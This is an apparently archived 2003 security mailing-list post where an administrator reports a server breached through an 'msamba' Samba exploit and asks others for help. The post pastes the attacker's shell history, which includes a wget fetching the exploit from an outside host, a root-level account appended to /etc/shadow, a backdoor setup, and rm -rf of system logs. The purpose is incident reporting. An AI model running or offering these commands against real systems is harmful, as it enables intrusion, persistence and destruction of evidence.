Hi, Has anyone seen an msamba exploit? A client of mine was cracked last night using this. Whoever it was configured it to erase everything after a reboot (I got in in time to see a lot of rm -rf and killed the box). I've now reinstalled and restored the data, but I suspect the script kiddie is trying to get in again. He was nice enough to leave a .bash_history in /root: ps -aux w find // | grep *db find // | grep *.db find // | grep index.html cd /var/www ls -al cd tracking ls -al cd files ls -al cd /usr/share/sgml/docbook/stylesheet/dsssl/modular/images ls -al exit cd /usr/share/doc ls -al cd /var/www ls -al find // | grep *.log cd tracking ls -al cd files ls -al find // | grep index.* find // | grep shop.mdb find // | grep *.mdb exit cd /var locate order.log locate order.txt locate mdb locate metacart locate card cd www echo "qe3 wuzz here uid=0">about_us.html ps -aux cd /etc/init.d ls -al ./apache reload ps -aux cd /usr/etc ls -al / df cd /opt ls -al wget cahcepu.net/dhegleng/msamba.tar.gz pstree -p chmod 555 /tmp chmod 555 /var/tmp chmod 555 /var/vbox /usr/sbin/lsof |grep LISTEN /sbin/fuser -n tcp 23 w dir tar xzvf 73.tgz cd " " dir ls cd .. dir cd evil ./setup muie 55055 angelboy@the-darkside.info w passwd daemon passwd daemon echo uid:x:0:0::/:/bin/bash >> /etc/shadow passwd $uid w locate .log rm -rf /var/log/ chmod 555 /tmp chmod 555 /var/tmp w pstree -p I picked up the copy of msamba and had a look at it; it looks like it's exploiting the recent samba bug for a wide variety of platforms (*BSD, SuSE, Slackware, Redhat, Mandrake, Gentoo and Debian). There's a tag in there that says "*** JE MOUET JE MUIL HOUWE - qe3" which I think might be Dutch (and I think, based on scans I'm seeing, the guy might be coming in from an IP registered to cyberangels.nl, but I don't have any hard proof). Mail is being sent to slamet_irdakat_private once the exploit gets in, with output from uname -a and id being sent. The datestamp on the files are 18 April 08:43, which makes me think this might be close on a zero day exploit. I can't find anything about msamba googling around, either. The only other hint I had was the client mentioned there was "a lot of stuff about gzip running out of memory on the screen". Unfortunately I don't have the data from the drive to do any forensics on; as /var/log had been deleted it wasn't felt justified to go in deeper, and I just reformatted and reinstalled. Anyone else seen this? I'd like to make sure I've got everything tied down enough that this won't happen again. Samba wasn't supposed to be on there, and it's now been removed. I have a suspicion ssl might have been involved too, due to the gzip comment and the way apache was reloaded. Cheers, Steve ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon Apr 21 2003 - 10:42:45 PDT